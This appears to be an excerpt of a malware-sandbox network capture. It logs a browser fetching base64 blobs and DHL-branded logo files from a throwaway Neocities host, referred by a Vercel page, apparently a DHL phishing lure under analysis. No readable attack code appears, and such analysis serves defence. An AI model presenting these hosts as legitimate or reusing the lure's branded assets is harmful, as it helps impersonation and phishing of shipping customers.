                          2024-07-09 09:33:23 UTC16384INData Raw: 72 6c 5a 44 6b 69 73 57 74 6c 33 49 30 6a 77 52 73 49 61 34 73 6a 47 77 43 4f 72 41 49 5a 43 39 2f 4c 5a 4b 53 70 44 53 73 39 59 37 44 35 58 47 39 69 45 38 67 53 34 66 41 72 77 4f 50 7a 72 52 5a 49 2f 44 2b 54 70 30 38 66 37 52 50 34 6e 30 4e 46 79 43 2f 4e 5a 48 70 73 6b 55 69 42 49 41 7a 6c 41 41 45 41 4b 67 41 51 41 49 41 45 41 43 42 67 67 41 51 41 49 41 45 41 43 41 42 41 41 67 41 51 49 45 41 47 45 41 43 41 46 36 46 41 68 45 44 42 41 43 6f 45 49 67 59 49 45 4b 67 41 51 4d 52 41 43 34 54 45 47 45 41 43 51 42 68 4d 42 63 49 41 4d 63 6b 41 42 43 42 42 68 41 41 67 41 53 47 4c 68 41 41 45 43 4c 4d 72 38 72 36 54 4e 6b 62 36 48 4e 46 45 62 52 6b 72 41 30 5a 4f 31 75 51 74 31 43 31 30 4d 6d 78 57 78 62 72 54 48 67 39 52 4f 5a 49 63 4d 47 56 31 39 49 4b 79 4e
                          Data Ascii: rlZDkisWtl3I0jwRsIa4sjGwCOrAIZC9/LZKSpDSs9Y7D5XG9iE8gS4fArwOPzrRZI/D+Tp08f7RP4n0NFyC/NZHpskUiBIAzlAAEAKgAQAIAEACBggAQAIAEACABAAgAQIEAGEACAF6FAhEDBACoEIgYIEKgAQMRAC4TEGEACQBhMBcIAMckABCBBhAAgASGLhAAECLMr8r6TNkb6HNFEbRkrA0ZO1uQt1C10MmxWxbrTHg9ROZIcMGV19IKyN
                          2024-07-09 09:33:23 UTC16384INData Raw: 34 48 4b 51 43 6f 45 43 59 41 67 51 71 41 44 4b 41 44 4b 41 44 4b 41 6f 54 4b 4c 48 51 4a 57 41 49 41 63 41 6d 49 58 4f 45 67 44 49 52 51 42 6c 46 41 4b 6b 4b 67 51 4d 45 41 77 7a 67 4a 69 6f 54 55 69 68 6a 77 2f 43 43 57 68 32 73 65 4b 64 73 56 44 32 75 4b 32 6a 4e 6b 4e 44 79 2f 5a 57 35 30 69 61 46 59 63 37 72 54 45 37 64 69 6b 54 74 4b 39 50 48 49 79 5a 4d 77 72 73 67 51 79 51 38 6c 71 79 45 52 6b 68 5a 53 61 52 53 52 47 2b 54 43 35 4d 75 65 6a 52 52 49 4a 4a 76 4e 63 4f 54 4d 61 52 69 56 33 54 65 43 34 33 6d 66 59 31 55 42 6f 4a 63 6f 74 76 63 72 59 73 52 74 77 46 32 34 56 53 36 6d 4d 6e 59 2f 4b 31 35 75 35 4e 43 61 6b 76 4d 48 51 6f 4b 75 4d 68 4e 44 79 54 70 57 73 70 4e 6f 6c 4c 71 51 35 39 4e 63 71 66 34 6a 53 75 67 39 33 4e 61 74 2f 69 36 43 51
                          Data Ascii: 4HKQCoECYAgQqADKADKADKAoTKLHQJWAIAcAmIXOEgDIRQBlFAKkKgQMEAwzgJioTUihjw/CCWh2seKdsVD2uK2jNkNDy/ZW50iaFYc7rTE7dikTtK9PHIyZMwrsgQyQ8lqyERkhZSaRSRG+TC5MuejRRIJJvNcOTMaRiV3TeC43mfY1UBoJcotvcrYsRtwF24VS6mMnY/K15u5NCakvMHQoKuMhNDyTpWspNolLqQ59Ncqf4jSug93Nat/i6CQ
                          2024-07-09 09:33:23 UTC16384INData Raw: 41 55 31 59 2b 79 53 36 56 63 78 5a 52 31 31 73 6e 6a 63 31 70 6a 6c 63 39 7a 47 79 6c 78 65 33 53 4d 6a 6e 6c 6a 68 75 6c 39 6d 54 37 48 4f 2b 4d 34 6f 71 35 78 61 66 38 62 66 37 6e 4c 33 2b 77 56 66 44 6c 66 39 43 71 52 46 33 75 68 73 72 58 51 76 31 4e 65 78 77 79 43 44 37 46 78 61 72 45 6f 64 6a 30 64 4e 71 49 5a 34 63 38 4e 76 31 2f 51 6f 78 56 74 56 44 67 78 31 4d 7a 50 75 76 49 58 43 38 63 4a 62 70 47 2f 4a 46 37 6f 30 61 66 69 61 39 30 37 52 33 64 32 72 57 2b 41 45 7a 6c 6a 4c 51 36 65 57 2b 4e 66 51 6c 36 62 45 39 34 72 36 46 2b 44 74 41 34 6f 68 77 47 33 6d 70 4f 50 33 69 48 66 4e 63 38 2b 44 36 4b 57 2b 4e 47 54 30 47 6e 65 38 45 61 45 48 61 6e 78 58 44 67 47 74 69 6c 2b 2f 43 30 2f 4a 59 53 38 50 36 47 58 75 31 38 32 5a 50 68 57 6d 66 62 39 79
                          Data Ascii: AU1Y+yS6VcxZR11snjc1pjlc9zGylxe3SMjnljhul9mT7HO+M4oq5xaf8bf7nL3+wVfDlf9CqRF3uhsrXQv1NexwyCD7FxarEodj0dNqIZ4c8Nv1/QoxVtVDgx1MzPuvIXC8cJbpG/JF7o0afia907R3d2rW+AEzljLQ6eW+NfQl6bE94r6F+DtA4ohwG3mpOP3iHfNc8+D6KW+NGT0Gne8EaEHanxXDgGtil+/C0/JYS8P6GXu182ZPhWmfb9y
                          2024-07-09 09:33:23 UTC16384INData Raw: 45 42 59 4b 4d 68 4a 31 59 35 2b 51 4e 46 4f 63 35 50 5a 69 71 51 6a 48 5a 6f 35 38 38 65 6d 4c 48 69 47 36 69 5a 6d 41 50 4c 63 66 31 49 78 58 52 48 4e 30 4d 35 4b 4e 74 77 6d 6b 30 6d 48 54 34 6e 67 49 6b 76 57 62 44 4a 33 74 77 39 65 59 78 2b 74 4e 51 6d 35 64 68 4f 63 46 48 75 59 4a 4c 2b 45 70 74 5a 51 4e 70 77 47 38 66 6b 61 32 56 49 78 64 51 35 70 31 49 69 35 77 73 6a 63 4e 75 51 41 47 7a 61 66 58 50 57 72 79 6f 7a 7a 6e 58 4d 30 62 51 69 51 53 4d 5a 4f 48 7a 58 62 34 2f 4d 31 6a 59 32 75 72 45 73 4c 6f 49 76 32 6a 79 37 76 4e 51 47 35 2f 55 69 69 55 51 68 4c 71 4f 73 72 36 4f 4d 75 72 51 47 5a 79 32 52 39 6f 79 4c 2f 41 4c 32 79 70 6c 45 75 4d 7a 52 48 65 48 44 45 57 4d 52 41 4f 64 6a 68 32 48 35 35 46 52 6c 56 39 79 6c 50 73 44 61 33 6b 74 76 64
                          Data Ascii: EBYKMhJ1Y5+QNFOc5PZiqQjHZo588emLHiG6iZmAPLcf1IxXRHN0M5KNtwmk0mHT4ngIkvWbDJ3tw9eYx+tNQm5dhOcFHuYJL+EptZQNpwG8fka2VIxdQ5p1Ii5wsjcNuQAGzafXPWryozznXM0bQiQSMZOHzXb4/M1jY2urEsLoIv2jy7vNQG5/UiiUQhLqOsr6OMurQGZy2R9oyL/AL2yplEuMzRHeHDEWMRAOdjh2H55FRlV9ylPsDa3ktvd
                          2024-07-09 09:33:23 UTC16384INData Raw: 63 4e 68 34 67 34 7a 36 47 6d 37 50 71 43 30 36 45 64 34 33 67 6b 32 4a 43 79 4d 63 62 6f 6e 42 63 6e 38 75 6c 4f 4d 62 76 6d 4a 76 54 6b 49 6a 67 33 52 53 4f 74 68 4c 4b 76 33 58 56 51 35 42 2f 6e 56 76 66 63 6c 62 62 47 53 55 4c 48 42 4d 5a 62 52 6c 51 45 4c 78 54 47 4f 54 65 4b 31 58 4d 6c 37 62 47 49 72 70 38 4e 30 70 6b 67 6b 57 42 78 75 41 5a 44 2b 67 38 71 31 75 37 61 4d 7a 30 54 32 4e 4d 4d 6d 6d 4a 6c 70 49 30 57 4e 78 33 47 4b 4d 44 38 6c 78 55 53 55 6e 7a 4c 54 6a 30 4d 63 39 31 61 45 76 75 69 68 34 51 35 4c 4c 78 58 55 2f 77 42 4b 75 50 7a 49 62 37 47 56 62 7a 54 69 52 75 74 6d 4a 38 53 4a 2b 52 46 61 5a 54 50 4d 67 33 66 53 64 79 6e 33 53 51 73 76 56 58 6d 77 70 48 30 35 30 74 51 62 6a 30 42 75 45 30 79 52 74 76 41 57 4b 4d 6a 49 57 4f 54 64
                          Data Ascii: cNh4g4z6Gm7PqC06Ed43gk2JCyMcbonBcn8ulOMbvmJvTkIjg3RSOthLKv3XVQ5B/nVvfclbbGSULHBMZbRlQELxTGOTeK1XMl7bGIrp8N0pkgkWBxuAZD+g8q1u7aMz0T2NMMmmJlpI0WNx3GKMD8lxUSUnzLTj0Mc91aEvuih4Q5LLxXU/wBKuPzIb7GVbzTiRutmJ8SJ+RFaZTPMg3fSdyn3SQsvVXmwpH050tQbj0BuE0yRtvAWKMjIWOTd
                          2024-07-09 09:33:23 UTC16384INData Raw: 6f 7a 67 2f 4f 70 75 70 62 49 74 71 79 31 59 76 33 2f 53 62 56 56 39 33 74 70 62 71 63 41 35 65 34 32 6f 6d 54 2f 6c 48 4d 2f 6e 52 77 36 6a 33 30 2b 52 4f 65 43 32 31 59 36 50 74 42 71 31 7a 62 74 62 68 77 76 4d 45 76 45 71 6f 2b 42 30 41 63 44 4f 4b 6c 30 59 5a 68 38 65 62 52 6b 74 34 54 63 53 79 74 4b 32 48 55 48 69 47 56 2f 35 6e 78 72 52 79 74 73 51 74 58 71 4a 55 32 59 64 7a 78 47 42 49 2f 43 54 2b 57 4b 72 55 6e 51 55 4a 62 55 58 51 5a 6f 6e 4d 58 4c 43 68 73 5a 2b 74 56 5a 67 6d 72 6d 69 37 31 43 4e 79 42 46 62 37 51 72 5a 35 6e 6e 6a 35 69 73 34 77 66 55 71 55 37 38 68 4e 39 65 57 6b 69 37 56 73 2b 48 49 54 38 66 45 59 6e 38 71 71 45 57 75 5a 4d 70 4c 6f 56 50 64 32 38 6c 74 47 46 74 6c 56 6c 58 61 43 47 50 4e 76 4f 6d 6f 75 2b 34 4f 57 67 69 57
                          Data Ascii: ozg/OpupbItqy1Yv3/SbVV93tpbqcA5e42omT/lHM/nRw6j30+ROeC21Y6PtBq1zbtbhwvMEvEqo+B0AcDOKl0YZh8ebRkt4TcSytK2HUHiGV/5nxrRytsQtXqJU2YdzxGBI/CT+WKrUnQUJbUXQZonMXLChsZ+tVZgmrmi71CNyBFb7QrZ5nnj5is4wfUqU78hN9eWki7Vs+HIT8fEYn8qqEWuZMpLoVPd28ltGFtlVlXaCGPNvOmou+4OWgiW
                          2024-07-09 09:33:23 UTC16384INData Raw: 4e 77 49 2f 77 42 56 54 5a 33 48 6e 51 4d 56 31 42 49 79 63 4a 5a 4a 63 71 51 36 6e 78 48 68 38 49 71 32 68 4a 6c 78 32 31 77 36 37 72 61 78 56 49 75 59 4c 7a 73 41 43 54 38 2f 4b 70 7a 6f 65 56 39 42 63 63 54 78 50 74 61 65 42 57 6a 50 50 68 6e 69 66 6c 6a 6c 56 62 69 74 59 70 4c 65 4b 65 62 61 38 73 38 33 6a 6a 41 54 4f 61 48 4a 6f 4c 4a 67 54 77 32 55 63 7a 63 47 46 67 42 79 79 37 6b 34 4e 56 46 74 6f 6c 32 75 44 67 76 50 45 73 4b 4d 66 49 72 47 53 53 66 6e 51 4d 36 45 75 6d 58 44 4e 47 38 77 4b 77 66 65 34 30 69 6a 42 39 52 6e 6c 57 66 45 69 58 6b 59 63 6c 6c 59 46 46 6a 6e 31 4f 7a 56 77 43 56 45 6d 39 76 31 41 78 55 35 33 66 53 4c 4b 79 72 6d 77 4a 37 62 54 6e 51 6d 34 31 4e 41 67 78 67 4c 45 35 41 35 64 52 6d 68 54 6c 30 47 31 48 71 44 4e 46 6f 33
                          Data Ascii: NwI/wBVTZ3HnQMV1BIycJZJcqQ6nxHh8Iq2hJlx21w67raxVIuYLzsACT8/KpzoeV9BccTxPtaeBWjPPhnifljlVbitYpLeKeba8s83jjATOaHJoLJgTw2UczcGFgByy7k4NVFtol2uDgvPEsKMfIrGSSfnQM6EumXDNG8wKwfe40ijB9RnlWfEiXkYcllYFFjn1OzVwCVEm9v1AxU53fSLKyrmwJ7bTnQm41NAgxgLE5A5dRmhTl0G1HqDNFo3
                          2024-07-09 09:33:23 UTC16384INData Raw: 58 63 50 6c 2f 53 71 73 53 58 4b 79 4e 45 53 4e 68 5a 54 79 32 6b 64 50 6c 69 68 62 67 39 6a 71 4e 43 76 42 45 6c 77 33 54 48 64 57 59 35 64 6a 34 44 46 56 38 67 61 4a 5a 32 30 71 43 52 5a 69 7a 4b 65 63 63 4b 75 75 4f 66 79 50 57 69 54 48 42 45 63 4c 45 6e 46 6c 74 72 69 4a 6f 33 77 54 78 57 7a 6b 2b 47 48 38 50 51 43 6b 74 65 5a 4c 45 79 32 36 78 68 47 6a 53 34 6e 34 35 42 5a 69 32 35 41 4d 2f 43 45 77 53 50 7a 71 73 31 78 5a 66 6d 4e 6c 4d 6b 41 6b 37 6c 37 62 32 2b 66 33 72 46 66 2f 46 33 53 51 4b 6c 61 39 43 6e 70 31 47 49 4a 62 66 45 6d 5a 5a 69 52 2b 39 36 79 6f 70 2f 43 41 46 36 30 65 39 6f 47 71 4d 6b 7a 6c 37 56 6d 74 6d 61 53 57 56 73 72 47 34 5a 7a 79 38 53 63 41 71 66 53 74 4f 65 6f 6d 39 4e 43 51 54 52 32 37 72 65 33 4b 33 59 43 70 73 6c 75
                          Data Ascii: XcPl/SqsSXKyNESNhZTy2kdPlihbg9jqNCvBElw3THdWY5dj4DFV8gaJZ20qCRZizKeccKuuOfyPWiTHBEcLEnFltriJo3wTxWzk+GH8PQCkteZLEy26xhGjS4n45BZi25AM/CEwSPzqs1xZfmNlMkAk7l7b2+f3rFf/F3SQKla9Cnp1GIJbfEmZZiR+96yop/CAF60e9oGqMkzl7VmtmaSWVsrG4Zzy8ScAqfStOeom9NCQTR27re3K3YCpslu


                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                          6192.168.2.749715198.51.233.24432708C:\Program Files\Google\Chrome\Application\chrome.exe
                          TimestampBytes transferredDirectionData
                          2024-07-09 09:33:22 UTC597OUTGET /logo.png HTTP/1.1
                          Host: asfasfasfasp.neocities.org
                          Connection: keep-alive
                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                          sec-ch-ua-mobile: ?0
                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                          sec-ch-ua-platform: "Windows"
                          Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                          Sec-Fetch-Site: cross-site
                          Sec-Fetch-Mode: no-cors
                          Sec-Fetch-Dest: image
                          Referer: https://jd-amber.vercel.app/
                          Accept-Encoding: gzip, deflate, br
                          Accept-Language: en-US,en;q=0.9
                          2024-07-09 09:33:23 UTC495INHTTP/1.1 200 OK
                          Date: Tue, 09 Jul 2024 09:33:23 GMT
                          Content-Type: image/png
                          Content-Length: 45618
                          Connection: close
                          Last-Modified: Wed, 22 Sep 2021 08:45:49 GMT
                          ETag: "614aed3d-b232"
                          Server: neocities
                          Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                          Content-Security-Policy: upgrade-insecure-requests; default-src 'unsafe-inline' 'unsafe-eval' 'self' data: blob: *
                          X-Neocities-CDN: cdn-ewr-1
                          Upgrade-Insecure-Requests: 1
                          X-Cached: HIT
                          Accept-Ranges: bytes
                          2024-07-09 09:33:23 UTC15889INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 02 58 00 00 00 96 08 06 00 00 00 02 1b f6 31 00 00 00 04 73 42 49 54 08 08 08 08 7c 08 64 88 00 00 00 09 70 48 59 73 00 00 0b 12 00 00 0b 12 01 d2 dd 7e fc 00 00 00 1f 74 45 58 74 53 6f 66 74 77 61 72 65 00 4d 61 63 72 6f 6d 65 64 69 61 20 46 69 72 65 77 6f 72 6b 73 20 38 b5 68 d2 78 00 00 02 1b 70 72 56 57 78 9c ed 95 5b ae dc 20 0c 86 b9 e6 32 d3 26 81 f2 d8 5d 64 4f f3 dc ed 64 33 5d 40 95 bd 74 07 cd b1 0d 4c 32 47 aa 94 ea 44 3a 52 f5 7f 90 81 80 63 63 6c 98 5f 7f 7e fe 56 3f d4 f7 8d 59 a9 6c eb ba 2d 54 97 ed 41 f5 b1 cd 54 e7 4d cd 2b b3 50 59 97 65 7d 50 7d ac 33 d5 79 55 8f 55 cd 0a 00 00 00 f8 8f f0 5f bd 77 83 f7 b5 1d ac 3d 4e f1 f8 bb 7e 95 b5 7f d5 f9 0f b4 29 be 96 5b 4c 53 9e 6a ca c0
                          Data Ascii: PNGIHDRX1sBIT|dpHYs~tEXtSoftwareMacromedia Fireworks 8hxprVWx[ 2&]dOd3]@tL2GD:Rccl_~V?Yl-TATM+PYe}P}3yUU_w=N~)[LSj
                          2024-07-09 09:33:23 UTC16384INData Raw: 79 97 9b ee a1 d4 7d 9b 01 da 9b be 6b 89 7d 7e fa 8c ee b1 d5 7c b5 4d 92 86 ef 27 38 19 43 54 17 fe ae a1 ac 6f 2b a8 5b 57 9e fa 82 cc f6 8c bd f8 86 55 99 e4 a9 ef ef 51 99 f5 fd 72 27 f6 f7 bd ee 5c e7 7f ad 27 e7 92 74 9c 54 59 b8 cf 77 f4 8a cc 7a 2e 44 f3 a5 3d a8 dc 57 7c d3 c9 7e 71 3d 5f a1 be 00 79 aa be 4d bb dc f1 e7 d9 d9 01 cd c7 f7 96 af e4 c7 8f 6b fe 01 74 a7 ef 62 53 3d 32 e6 fb 7c a5 d2 b1 cf 79 b4 4e da 5f 7d 4f af ee 65 d7 f9 94 e6 91 bd db 8f f6 e0 fd f0 74 4c e0 9c 53 36 9f 71 60 43 ff ed cc 6a 1c 66 fd b4 33 96 23 cb e9 dc b0 b3 3f 7a d5 31 0b ff e9 ed 48 ed af fe 5d f7 9a 93 e7 89 fd f5 5c 22 ed 57 cb cc de 5d e5 f3 ac ca fe fc 4f 3b be 32 27 40 be ec e3 40 7e 74 47 1b ce fc 3a ba ab fc aa e7 7b e5 dd 75 81 ca fe ea 37 01 6d 31
                          Data Ascii: y}k}~|M'8CTo+[WUQr'\'tTYwz.D=W|~q=_yMktbS=2|yN_}OetLS6q`Cjf3#?z1H]\"W]O;2'@@~tG:{u7m1
                          2024-07-09 09:33:23 UTC13345INData Raw: 6d 8d bb a3 73 db 6b bc df b6 ba e7 a3 ef 88 70 5b 0c 82 cd 07 68 86 3d 4d 8f f6 a6 a8 6f 65 6b dc 8b 8d 2b cb 78 ec 43 5c 10 fd 86 22 4a 92 a4 df 36 0f da 7c c0 9d 04 bd eb fe 43 6d cf 6d 92 7b cf 4f cc 45 7c 1e 3d 56 78 ec 7b f5 e0 83 bf b2 d6 ba 7f 99 3a 1f 9e 69 7a 78 ad 5e ed 31 f7 6b 43 85 37 4b 9b db 51 26 b8 ba 2b 32 9c a8 c9 e1 b1 ef 17 ed 7f f9 ab b4 75 5c dc da 8f cf 46 3e 8e c7 07 3e 1d c4 0a de aa 2d d1 ea 5d 50 db 11 ed 5d a5 c8 42 92 03 1a f2 d8 56 f4 d5 7f f7 47 2a d2 bd 5a cd 82 68 3b 8c 03 b1 19 c4 68 f4 6a 1f c5 d6 b9 6d d3 03 8d 2b 1f 44 1f 3e d4 79 bd 1b c8 71 bf 1b 70 14 88 66 77 e5 e4 1c f4 81 e3 39 e7 a3 6f dc ef c2 f3 e6 e0 ff 21 da 0e a3 41 6c d6 28 ed ad 0c ce 44 66 ee 25 79 36 ac 68 13 41 10 23 83 e6 ff d8 06 be da f4 86 a5 b7
                          Data Ascii: mskp[h=Moek+xC\"J6|Cmm{OE|=Vx{:izx^1kC7KQ&+2u\F>>-]P]BVG*Zh;hjm+D>yqpfw9o!Al(Df%y6hA#


                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                          7192.168.2.749712198.51.233.24432708C:\Program Files\Google\Chrome\Application\chrome.exe
                          TimestampBytes transferredDirectionData
                          2024-07-09 09:33:22 UTC603OUTGET /mydhl-plus.svg HTTP/1.1
                          Host: asfasfasfasp.neocities.org
                          Connection: keep-alive
                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                          sec-ch-ua-mobile: ?0
                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                          sec-ch-ua-platform: "Windows"
                          Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                          Sec-Fetch-Site: cross-site
                          Sec-Fetch-Mode: no-cors
                          Sec-Fetch-Dest: image
                          Referer: https://jd-amber.vercel.app/
                          Accept-Encoding: gzip, deflate, br
                          Accept-Language: en-US,en;q=0.9
                          2024-07-09 09:33:23 UTC520INHTTP/1.1 200 OK
                          Date: Tue, 09 Jul 2024 09:33:23 GMT
                          Content-Type: image/svg+xml
                          Content-Length: 1452
                          Connection: close
                          Vary: Accept-Encoding
                          Last-Modified: Wed, 22 Sep 2021 08:51:08 GMT
                          ETag: "614aee7c-5ac"
                          Server: neocities
                          Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                          Content-Security-Policy: upgrade-insecure-requests; default-src 'unsafe-inline' 'unsafe-eval' 'self' data: blob: *
                          X-Neocities-CDN: cdn-ewr-1
                          Upgrade-Insecure-Requests: 1
                          X-Cached: HIT
                          Accept-Ranges: bytes
                          2024-07-09 09:33:23 UTC1452INData Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0a 3c 21 2d 2d 20 47 65 6e 65 72 61 74 6f 72 3a 20 41 64 6f 62 65 20 49 6c 6c 75 73 74 72 61 74 6f 72 20 32 34 2e 30 2e 31 2c 20 53 56 47 20 45 78 70 6f 72 74 20 50 6c 75 67 2d 49 6e 20 2e 20 53 56 47 20 56 65 72 73 69 6f 6e 3a 20 36 2e 30 30 20 42 75 69 6c 64 20 30 29 20 20 2d 2d 3e 0a 3c 73 76 67 20 76 65 72 73 69 6f 6e 3d 22 31 2e 31 22 20 69 64 3d 22 4d 79 44 48 4c 5f 22 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 30 2f 73 76 67 22 20 78 6d 6c 6e 73 3a 78 6c 69 6e 6b 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 6c 69 6e 6b 22 20 78 3d 22 30 70 78 22 20 79 3d 22 30
                          Data Ascii: <?xml version="1.0" encoding="utf-8"?>... Generator: Adobe Illustrator 24.0.1, SVG Export Plug-In . SVG Version: 6.00 Build 0) --><svg version="1.1" id="MyDHL_" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" x="0px" y="0


                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                          8192.168.2.749723198.51.233.24432708C:\Program Files\Google\Chrome\Application\chrome.exe
                          TimestampBytes transferredDirectionData
                          2024-07-09 09:33:24 UTC364OUTGET /mydhl-plus.svg HTTP/1.1
                          Host: asfasfasfasp.neocities.org
                          Connection: keep-alive
                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                          Accept: */*
                          Sec-Fetch-Site: none
                          Sec-Fetch-Mode: cors
                          Sec-Fetch-Dest: empty
                          Accept-Encoding: gzip, deflate, br
                          Accept-Language: en-US,en;q=0.9
                          2024-07-09 09:33:24 UTC520INHTTP/1.1 200 OK
                          Date: Tue, 09 Jul 2024 09:33:24 GMT
                          Content-Type: image/svg+xml
                          Content-Length: 1452
                          Connection: close
                          Vary: Accept-Encoding
                          Last-Modified: Wed, 22 Sep 2021 08:51:08 GMT
                          ETag: "614aee7c-5ac"
                          Server: neocities
                          Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                          Content-Security-Policy: upgrade-insecure-requests; default-src 'unsafe-inline' 'unsafe-eval' 'self' data: blob: *
                          X-Neocities-CDN: cdn-ewr-1
                          Upgrade-Insecure-Requests: 1
                          X-Cached: HIT
                          Accept-Ranges: bytes
                          2024-07-09 09:33:24 UTC1452INData Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0a 3c 21 2d 2d 20 47 65 6e 65 72 61 74 6f 72 3a 20 41 64 6f 62 65 20 49 6c 6c 75 73 74 72 61 74 6f 72 20 32 34 2e 30 2e 31 2c 20 53 56 47 20 45 78 70 6f 72 74 20 50 6c 75 67 2d 49 6e 20 2e 20 53 56 47 20 56 65 72 73 69 6f 6e 3a 20 36 2e 30 30 20 42 75 69 6c 64 20 30 29 20 20 2d 2d 3e 0a 3c 73 76 67 20 76 65 72 73 69 6f 6e 3d 22 31 2e 31 22 20 69 64 3d 22 4d 79 44 48 4c 5f 22 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 30 2f 73 76 67 22 20 78 6d 6c 6e 73 3a 78 6c 69 6e 6b 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 6c 69 6e 6b 22 20 78 3d 22 30 70 78 22 20 79 3d 22 30
                          Data Ascii: <?xml version="1.0" encoding="utf-8"?>... Generator: Adobe Illustrator 24.0.1, SVG Export Plug-In . SVG Version: 6.00 Build 0) --><svg version="1.1" id="MyDHL_" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" x="0px" y="0


                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                          9192.168.2.749722198.51.233.24432708C:\Program Files\Google\Chrome\Application\chrome.exe
                          TimestampBytes transferredDirectionData
                          2024-07-09 09:33:24 UTC358OUTGET /logo.png HTTP/1.1
                          Host: asfasfasfasp.neocities.org
                          Connection: keep-alive
                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                          Accept: */*
                          Sec-Fetch-Site: none
                          Sec-Fetch-Mode: cors
                          Sec-Fetch-Dest: empty
                          Accept-Encoding: gzip, deflate, br
                          Accept-Language: en-US,en;q=0.9
                          2024-07-09 09:33:24 UTC495INHTTP/1.1 200 OK
                          Date: Tue, 09 Jul 2024 09:33:24 GMT
                          Content-Type: image/png
                          Content-Length: 45618
                          Connection: close
                          Last-Modified: Wed, 22 Sep 2021 08:45:49 GMT
                          ETag: "614aed3d-b232"
                          Server: neocities
                          Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                          Content-Security-Policy: upgrade-insecure-requests; default-src 'unsafe-inline' 'unsafe-eval' 'self' data: blob: *
                          X-Neocities-CDN: cdn-ewr-1
                          Upgrade-Insecure-Requests: 1
                          X-Cached: HIT
                          Accept-Ranges: bytes
                          2024-07-09 09:33:24 UTC15889INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 02 58 00 00 00 96 08 06 00 00 00 02 1b f6 31 00 00 00 04 73 42 49 54 08 08 08 08 7c 08 64 88 00 00 00 09 70 48 59 73 00 00 0b 12 00 00 0b 12 01 d2 dd 7e fc 00 00 00 1f 74 45 58 74 53 6f 66 74 77 61 72 65 00 4d 61 63 72 6f 6d 65 64 69 61 20 46 69 72 65 77 6f 72 6b 73 20 38 b5 68 d2 78 00 00 02 1b 70 72 56 57 78 9c ed 95 5b ae dc 20 0c 86 b9 e6 32 d3 26 81 f2 d8 5d 64 4f f3 dc ed 64 33 5d 40 95 bd 74 07 cd b1 0d 4c 32 47 aa 94 ea 44 3a 52 f5 7f 90 81 80 63 63 6c 98 5f 7f 7e fe 56 3f d4 f7 8d 59 a9 6c eb ba 2d 54 97 ed 41 f5 b1 cd 54 e7 4d cd 2b b3 50 59 97 65 7d 50 7d ac 33 d5 79 55 8f 55 cd 0a 00 00 00 f8 8f f0 5f bd 77 83 f7 b5 1d ac 3d 4e f1 f8 bb 7e 95 b5 7f d5 f9 0f b4 29 be 96 5b 4c 53 9e 6a ca c0
                          Data Ascii: PNGIHDRX1sBIT|dpHYs~tEXtSoftwareMacromedia Fireworks 8hxprVWx[ 2&]dOd3]@tL2GD:Rccl_~V?Yl-TATM+PYe}P}3yUU_w=N~)[LSj
                          2024-07-09 09:33:24 UTC16384INData Raw: 79 97 9b ee a1 d4 7d 9b 01 da 9b be 6b 89 7d 7e fa 8c ee b1 d5 7c b5 4d 92 86 ef 27 38 19 43 54 17 fe ae a1 ac 6f 2b a8 5b 57 9e fa 82 cc f6 8c bd f8 86 55 99 e4 a9 ef ef 51 99 f5 fd 72 27 f6 f7 bd ee 5c e7 7f ad 27 e7 92 74 9c 54 59 b8 cf 77 f4 8a cc 7a 2e 44 f3 a5 3d a8 dc 57 7c d3 c9 7e 71 3d 5f a1 be 00 79 aa be 4d bb dc f1 e7 d9 d9 01 cd c7 f7 96 af e4 c7 8f 6b fe 01 74 a7 ef 62 53 3d 32 e6 fb 7c a5 d2 b1 cf 79 b4 4e da 5f 7d 4f af ee 65 d7 f9 94 e6 91 bd db 8f f6 e0 fd f0 74 4c e0 9c 53 36 9f 71 60 43 ff ed cc 6a 1c 66 fd b4 33 96 23 cb e9 dc b0 b3 3f 7a d5 31 0b ff e9 ed 48 ed af fe 5d f7 9a 93 e7 89 fd f5 5c 22 ed 57 cb cc de 5d e5 f3 ac ca fe fc 4f 3b be 32 27 40 be ec e3 40 7e 74 47 1b ce fc 3a ba ab fc aa e7 7b e5 dd 75 81 ca fe ea 37 01 6d 31
